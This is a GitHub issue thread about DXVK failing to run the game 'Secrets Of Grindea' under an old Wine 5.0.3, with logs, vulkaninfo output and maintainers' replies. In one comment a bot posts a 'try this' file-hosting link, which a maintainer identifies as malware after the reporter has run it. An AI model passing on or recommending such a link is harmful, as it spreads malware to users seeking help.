### ISSUE TITLE
Bug for "Secret Of Grindea" && d3dx9 : err (might) -> Required Vulkan extension VK_EXT_robustness2 not supported

### ISSUE THREAD

**Issue by Dufferent** [doitsujin/dxvk#4236]
# Start & Debug Infomation
wine Secrets\ Of\ Grindea.exe
0025:err:winediag:xrandr12_init_modes Broken NVIDIA RandR detected, falling back to RandR 1.0. Please consider using the Nouveau driver instead.
0009:fixme:ntdll:NtQuerySystemInformation info_class SYSTEM_PERFORMANCE_INFORMATION
000d:err:winediag:xrandr12_init_modes Broken NVIDIA RandR detected, falling back to RandR 1.0. Please consider using the Nouveau driver instead.
0009:fixme:ntdll:EtwEventRegister ({e13c0d23-ccbc-4e12-931b-d9cc2eee27e4}, 0x7932a40c, 0x797293b0, 0x79764880) stub.
0009:fixme:ntdll:EtwEventRegister ({763fd754-7086-4dfe-95eb-c01a46faf4ca}, 0x7932a40c, 0x797292f0, 0x79729998) stub.
0009:fixme:ntdll:EtwEventRegister ({a669021c-c450-4609-a035-5af59af4df18}, 0x7932a40c, 0x79764890, 0x79764888) stub.
0009:fixme:ntdll:EtwEventRegister ({cc2bcbba-16b6-4cf3-8990-d74c2e8af500}, 0x7932a40c, 0x797648c0, 0x797292e8) stub.
0009:fixme:wer:WerRegisterRuntimeExceptionModule (L"C:\\windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscordacwks.dll", 0x79140000) stub!
0009:fixme:path:parse_url failed to parse L"Steamworks.NET"
0009:fixme:path:parse_url failed to parse L"Microsoft.Xna.Framework.Game"
0009:fixme:path:parse_url failed to parse L"Microsoft.Xna.Framework"
0009:fixme:nls:LCIDToLocaleName unsupported flags 8000000
0009:fixme:nls:get_dummy_preferred_ui_language (0x0 0x32e56c (nil) 0x32e568) returning a dummy value (current locale)
0009:fixme:nls:get_dummy_preferred_ui_language (0x0 0x32e56c 0x1838970 0x32e568) returning a dummy value (current locale)
0009:fixme:path:parse_url failed to parse L"System.Core"
0009:fixme:path:parse_url failed to parse L"System"
0009:fixme:path:parse_url failed to parse L"Microsoft.Xna.Framework.Graphics"
0009:err:winediag:xrandr12_init_modes Broken NVIDIA RandR detected, falling back to RandR 1.0. Please consider using the Nouveau driver instead.
0009:fixme:path:parse_url failed to parse L"Microsoft.Xna.Framework.Input.Touch"
0009:fixme:path:parse_url failed to parse L"System.Drawing"
0009:fixme:path:parse_url failed to parse L"System.Windows.Forms"
0009:fixme:path:parse_url failed to parse L"Accessibility"
info:  Game: Secrets Of Grindea.exe
info:  DXVK: v2.4
info:  Vulkan: Found vkGetInstanceProcAddr in vulkan-1.dll @ 0xf6155d40
info:  Built-in extension providers:
info:    Platform WSI
info:    OpenVR
info:    OpenXR
info:  OpenVR: could not open registry key, status 2
info:  OpenVR: Failed to locate module
info:  Enabled instance extensions:
info:    VK_KHR_surface
info:    VK_KHR_win32_surface
info:  D3D9: VK_FORMAT_D16_UNORM_S8_UINT -> VK_FORMAT_D24_UNORM_S8_UINT
info:  NVIDIA GeForce RTX 3060 Laptop GPU:
info:    Driver : NVIDIA 535.129.3
info:    Memory Heap[0]: 
info:      Size: 6144 MiB
info:      Flags: 0x1
info:      Memory Type[1]: Property Flags = 0x1
info:      Memory Type[4]: Property Flags = 0x7
info:    Memory Heap[1]: 
info:      Size: 24062 MiB
info:      Flags: 0x0
info:      Memory Type[0]: Property Flags = 0x0
info:      Memory Type[2]: Property Flags = 0x6
info:      Memory Type[3]: Property Flags = 0xe
info:  D3D9: VK_FORMAT_D16_UNORM_S8_UINT -> VK_FORMAT_D24_UNORM_S8_UINT
info:  NVIDIA GeForce RTX 3060 Laptop GPU:
info:    Driver : NVIDIA 535.129.3
info:    Memory Heap[0]: 
info:      Size: 6144 MiB
info:      Flags: 0x1
info:      Memory Type[1]: Property Flags = 0x1
info:      Memory Type[4]: Property Flags = 0x7
info:    Memory Heap[1]: 
info:      Size: 24062 MiB
info:      Flags: 0x0
info:      Memory Type[0]: Property Flags = 0x0
info:      Memory Type[2]: Property Flags = 0x6
info:      Memory Type[3]: Property Flags = 0xe
info:  Process set as DPI aware
0009:fixme:process:FlushProcessWriteBuffers : stub
info:  Required Vulkan extension VK_EXT_robustness2 not supported
err:   DxvkAdapter: Failed to create device
0009:fixme:ntdll:EtwEventRegister ({8e9f5090-2d75-4d03-8a81-e5afbf85daf1}, 0x1990c82, (nil), 0x1d93398) stub.
0009:fixme:gdiplus:GdipCreateHalftonePalette stub
002c:fixme:ntdll:EtwEventUnregister (deadbeef) stub.

# part of vulkaninfo 
vulkaninfo |grep VK_EXT
	VK_EXT_acquire_xlib_display         : extension revision  1
	VK_EXT_debug_report                 : extension revision 10
	VK_EXT_debug_utils                  : extension revision  2
	VK_EXT_direct_mode_display          : extension revision  1
	VK_EXT_display_surface_counter      : extension revision  1
	VK_EXT_debug_report                 : extension revision  6
	VK_EXT_debug_report                 : extension revision  6
	VK_EXT_debug_marker                 : extension revision  4
	VK_EXT_debug_report                 : extension revision  6
	VK_EXT_debug_marker                 : extension revision  4
	VK_EXT_validation_cache             : extension revision  1
        VK_EXT_debug_report                 : extension revision  6
	VK_EXT_debug_marker                 : extension revision  4
	VK_EXT_debug_report                 : extension revision  6
	VK_EXT_debug_marker                 : extension revision  4
	VK_EXT_validation_cache             : extension revision  1
	VK_EXT_4444_formats                 : extension revision  1
	VK_EXT_attachment_feedback_loop_layout: extension revision  2
	VK_EXT_blend_operation_advanced     : extension revision  2
	VK_EXT_border_color_swizzle         : extension revision  1
	VK_EXT_buffer_device_address        : extension revision  2
	VK_EXT_calibrated_timestamps        : extension revision  2
	VK_EXT_color_write_enable           : extension revision  1
	VK_EXT_conditional_rendering        : extension revision  2
	VK_EXT_conservative_rasterization   : extension revision  1
	VK_EXT_custom_border_color          : extension revision 12
	VK_EXT_depth_clamp_zero_one         : extension revision  1
	VK_EXT_depth_clip_control           : extension revision  1
	VK_EXT_depth_clip_enable            : extension revision  1
	VK_EXT_depth_range_unrestricted     : extension revision  1
	VK_EXT_descriptor_buffer            : extension revision  1
	VK_EXT_descriptor_indexing          : extension revision  2
	VK_EXT_discard_rectangles           : extension revision  2
	VK_EXT_display_control              : extension revision  1
	VK_EXT_extended_dynamic_state       : extension revision  1
	VK_EXT_extended_dynamic_state2      : extension revision  1
	VK_EXT_extended_dynamic_state3      : extension revision  2
	VK_EXT_external_memory_host         : extension revision  1
	VK_EXT_fragment_shader_interlock    : extension revision  1
	VK_EXT_global_priority              : extension revision  2
	VK_EXT_global_priority_query        : extension revision  1
	VK_EXT_graphics_pipeline_library    : extension revision  1
	VK_EXT_host_query_reset             : extension revision  1
	VK_EXT_image_2d_view_of_3d          : extension revision  1
	VK_EXT_image_drm_format_modifier    : extension revision  2
	VK_EXT_image_robustness             : extension revision  1
	VK_EXT_image_sliced_view_of_3d      : extension revision  1
	VK_EXT_image_view_min_lod           : extension revision  1
	VK_EXT_index_type_uint8             : extension revision  1
	VK_EXT_inline_uniform_block         : extension revision  1
	VK_EXT_line_rasterization           : extension revision  1
	VK_EXT_load_store_op_none           : extension revision  1
	VK_EXT_memory_budget                : extension revision  1
	VK_EXT_memory_priority              : extension revision  1
	VK_EXT_mesh_shader                  : extension revision  1
	VK_EXT_multi_draw                   : extension revision  1
	VK_EXT_mutable_descriptor_type      : extension revision  1
	VK_EXT_non_seamless_cube_map        : extension revision  1
	VK_EXT_opacity_micromap             : extension revision  2
	VK_EXT_pageable_device_local_memory : extension revision  1
	VK_EXT_pci_bus_info                 : extension revision  2
	VK_EXT_physical_device_drm          : extension revision  1
	VK_EXT_pipeline_creation_cache_control: extension revision  3
	VK_EXT_pipeline_creation_feedback   : extension revision  1
	VK_EXT_pipeline_library_group_handles: extension revision  1
	VK_EXT_pipeline_robustness          : extension revision  1
	VK_EXT_post_depth_coverage          : extension revision  1
	VK_EXT_primitive_topology_list_restart: extension revision  1
	VK_EXT_primitives_generated_query   : extension revision  1
	VK_EXT_private_data                 : extension revision  1
	VK_EXT_provoking_vertex             : extension revision  1
	VK_EXT_queue_family_foreign         : extension revision  1
	VK_EXT_robustness2                  : extension revision  1
	VK_EXT_sample_locations             : extension revision  1
	VK_EXT_sampler_filter_minmax        : extension revision  2
	VK_EXT_scalar_block_layout          : extension revision  1
	VK_EXT_separate_stencil_usage       : extension revision  1
	VK_EXT_shader_atomic_float          : extension revision  1
	VK_EXT_shader_demote_to_helper_invocation: extension revision  1
	VK_EXT_shader_image_atomic_int64    : extension revision  1
	VK_EXT_shader_module_identifier     : extension revision  1
	VK_EXT_shader_object                : extension revision  1
	VK_EXT_shader_subgroup_ballot       : extension revision  1
	VK_EXT_shader_subgroup_vote         : extension revision  1
	VK_EXT_shader_viewport_index_layer  : extension revision  1
	VK_EXT_subgroup_size_control        : extension revision  2
	VK_EXT_texel_buffer_alignment       : extension revision  1
	VK_EXT_tooling_info                 : extension revision  1
	VK_EXT_transform_feedback           : extension revision  1
	VK_EXT_vertex_attribute_divisor     : extension revision  3
	VK_EXT_vertex_input_dynamic_state   : extension revision  2
	VK_EXT_ycbcr_2plane_444_formats     : extension revision  1
	VK_EXT_ycbcr_image_arrays           : extension revision  1

# NVIDIA Driver Information
+---------------------------------------------------------------------------------------+
| NVIDIA-SMI 535.129.03             Driver Version: 535.129.03   CUDA Version: 12.2     |
|-----------------------------------------+----------------------+----------------------+

# Problem Description
In fact, I had made it work well with my independent graphic card (NVIDIA GeForce 3060 Laptop) at the beigining. And I can't open the game any more when I update my wine env. (instead of a new wine env with the same installed package) And the stdout just tell me that my driver might lack of VK_EXT_robustness2. As you can see, my nvidia driver is new enough and has the corresponding extension. I'm so confused about it and tried many approaches to solve it, but the game just can't use the nvidia driver to run (I can run the game well without d3dx9.dll). Please help me to deal with it, thanks a lot!

**Comment by Player1mene** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by Dufferent** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

I can't even run "x86_64-w64-ranlib.exe"  :
0025:err:winediag:xrandr12_init_modes Broken NVIDIA RandR detected, falling back to RandR 1.0. Please consider using the Nouveau driver instead.
000d:err:winediag:xrandr12_init_modes Broken NVIDIA RandR detected, falling back to RandR 1.0. Please consider using the Nouveau driver instead.
wine: Unhandled page fault on read access to 10004000 at address 0042B3AE (thread 0009), starting debugger...
002c:err:winediag:xrandr12_init_modes Broken NVIDIA RandR detected, falling back to RandR 1.0. Please consider using the Nouveau driver instead.
002c:fixme:dbghelp:elf_search_auxv can't find symbol in module
002c:fixme:dbghelp:elf_search_auxv can't find symbol in module
002c:fixme:dbghelp:elf_search_auxv can't find symbol in module
002c:fixme:dbghelp:elf_search_auxv can't find symbol in module
002c:fixme:dbghelp:elf_search_auxv can't find symbol in module
002c:fixme:dbghelp:elf_search_auxv can't find symbol in module
002c:fixme:dbghelp:elf_search_auxv can't find symbol in module
002c:fixme:dbghelp:elf_search_auxv can't find symbol in module
002c:fixme:dbghelp:elf_search_auxv can't find symbol in module
002c:fixme:dbghelp:elf_search_auxv can't find symbol in module
002c:fixme:dbghelp:elf_search_auxv can't find symbol in module
002c:fixme:dbghelp:elf_search_auxv can't find symbol in module
002c:fixme:dbghelp:elf_search_auxv can't find symbol in module
002c:fixme:dbghelp:elf_search_auxv can't find symbol in module
002c:fixme:dbghelp:elf_search_auxv can't find symbol in module
Unhandled exception: page fault on read access to 0x10004000 in 32-bit code (0x0042b3ae).
002c:fixme:dbghelp:elf_search_auxv can't find symbol in module
Register dump:
 CS:0023 SS:002b DS:002b ES:002b FS:0063 GS:006b
 EIP:0042b3ae ESP:0032f88c EBP:0032fa48 EFLAGS:00010203(  R- --  I   - - -C)
 EAX:10261000 EBX:7ffdf000 ECX:0025d000 EDX:00260000
 ESI:10004000 EDI:7bc34000
Stack dump:
0x0032f88c:  00001000 0021ab48 0040eef3 7bc31000
0x0032f89c:  10001000 00260000 0043a001 00000020
0x0032f8ac:  7bc30138 fe296570 0043a0c8 fe296570
0x0032f8bc:  00000504 7bc30040 7bc30000 10000000
0x0032f8cc:  00000060 0000005c 7bc30000 7bc30000
0x0032f8dc:  ffffffff 0043a0c8 0032f8ac 0032f8a8
Backtrace:
=>0 0x0042b3ae in x86_64-w64-ranlib (+0x2b3ae) (0x0032fa48)
  1 0x00415f5a EntryPoint+0xffffffff() in x86_64-w64-ranlib (0x0032fe88)
  2 0x0042a751 EntryPoint+0xffffffff() in x86_64-w64-ranlib (0x0032fed0)
  3 0x7b4536b1 call_process_entry+0x10() in kernel32 (0x0032fee8)
  4 0x7b453b74 start_process+0x193() in kernel32 (0x0032ffd8)
  5 0x7b4536c2 __wine_start_process+0x9() in kernel32 (0x0032ffec)
0x0042b3ae: repe movsb	(%esi),%es:(%edi)
Modules:
Module	Address			Debug info	Name (38 modules)
PE	  400000-  445000	Export          x86_64-w64-ranlib
PE	65980000-65999000	Deferred        version
PE	6ba80000-6ba8c000	Deferred        api-ms-win-core-fibers-l1-1-1
PE	6c0c0000-6c0fb000	Deferred        imm32
PE	6e540000-6e54d000	Deferred        api-ms-win-core-synch-l1-2-0
PE	6e8c0000-6e8cd000	Deferred        api-ms-win-core-localization-l1-2-1
PE	6ec80000-6ec8c000	Deferred        api-ms-win-core-fibers-l1-1-0
PE	7b000000-7b265000	Deferred        kernelbase
ELF	7b400000-7b672000	Dwarf           kernel32<elf>
  \-PE	7b420000-7b672000	\               kernel32
ELF	7bc00000-7beb0000	Deferred        ntdll<elf>
  \-PE	7bc30000-7beb0000	\               ntdll
ELF	7c000000-7c004000	Deferred        <wine-loader>
ELF	7e4f8000-7e522000	Deferred        libexpat.so.1
ELF	7e522000-7e56b000	Deferred        libfontconfig.so.1
ELF	7e56b000-7e596000	Deferred        libpng12.so.0
ELF	7e596000-7e5b1000	Deferred        libz.so.1
ELF	7e5b1000-7e661000	Deferred        libfreetype.so.6
ELF	7e661000-7e684000	Deferred        libtinfo.so.5
ELF	7e684000-7e6aa000	Deferred        libncurses.so.5
ELF	7e6aa000-7e780000	Deferred        msvcrt<elf>
  \-PE	7e6d0000-7e780000	\               msvcrt
ELF	7e780000-7e803000	Deferred        advapi32<elf>
  \-PE	7e790000-7e803000	\               advapi32
ELF	7e803000-7e95b000	Deferred        gdi32<elf>
  \-PE	7e820000-7e95b000	\               gdi32
ELF	7e95b000-7eb8d000	Deferred        user32<elf>
  \-PE	7e980000-7eb8d000	\               user32
ELF	7ef40000-7ef53000	Deferred        libnss_files.so.2
ELF	7ef53000-7ef60000	Deferred        libnss_nis.so.2
ELF	7ef60000-7ef7b000	Deferred        libnsl.so.1
ELF	7ef7b000-7ef85000	Deferred        libnss_compat.so.2
ELF	7ef85000-7efda000	Deferred        libm.so.6
ELF	f7b24000-f7b29000	Deferred        libdl.so.2
ELF	f7b29000-f7ce0000	Deferred        libc.so.6
ELF	f7ce0000-f7cfd000	Deferred        libpthread.so.0
ELF	f7d23000-f7ed6000	Dwarf           libwine.so.1
ELF	f7ed7000-f7efc000	Deferred        ld-linux.so.2
Threads:
process  tid      prio (all id:s are in hex)
00000008 (D) Z:\home\xny\Downloads\winehq\package\Secrets.Of.Grindea.v1.0\fixed\fix\x86_64-w64-ranlib.exe
	00000009    0 <==
	0000002d    0
0000000e services.exe
	0000000f    0
	00000010    0
	00000013    0
	00000014    0
	00000015    0
	0000001b    0
	00000020    0
	00000027    0
00000011 winedevice.exe
	00000012    0
	00000016    0
	00000017    0
	00000018    0
00000019 plugplay.exe
	0000001a    0
	0000001c    0
	0000001d    0
0000001e winedevice.exe
	0000001f    0
	00000021    0
	00000022    0
	00000023    0
	00000026    0
00000024 explorer.exe
	00000025    0
	00000028    0
	00000029    0
	0000002a    0
System information:
    Wine build: wine-5.0.3
    Platform: i386 (WOW64)
    Version: Windows 7
    Host system: Linux
    Host version: 4.15.0-142-generic

And the msvcp140.dll already in my wine's "system32" & "syswow64" floder.

**Comment by K0bin** [comment]
That was a bot and the link was malware.

**Comment by Dufferent** [comment]
> That was a bot and the link was malware.

haha, I said why so fast. . .

**Comment by Blisto91** [comment]
@Dufferent I think your issue here is that your Wine version is very very old. 5.0.3 (Kernel too but issue is probably just Wine)

**Comment by Dufferent** [comment]
> I think your issue here is that your Wine version is very very old 5.0.3 (Kernel too but issue is probably just Wine)

Yeah, but I have made it work before so that I wonder what the problem is. Thanks agian if any one can help to solve it!!!

**Comment by K0bin** [comment]
DXVK has required the Vulkan extension VK_EXT_robustness2 for a while and support for that in Wine requires a Wine version that isn't ancient.

**Comment by Dufferent** [comment]
> DXVK has required the Vulkan extension VK_EXT_robustness2 for a while and support for that in Wine requires a Wine version that isn't ancient.

> Yes, I have also considered it to be a problem with the wine version. But I used the same version of wine to run the game successfully before. All I did was rebuild a new wineprefix.

**Comment by K0bin** [comment]
Either way, we don't provide support for ancient versions of Wine.

**Comment by Dufferent** [comment]
Well, thanks.

**Comment by Dufferent** [comment]
Using dxvk 1.7.2, which was released around the same time as wine 5.0.3, solved my problem.

**Comment by K0bin** [comment]
Or... you know... You could use software that's not yet 4 years old.
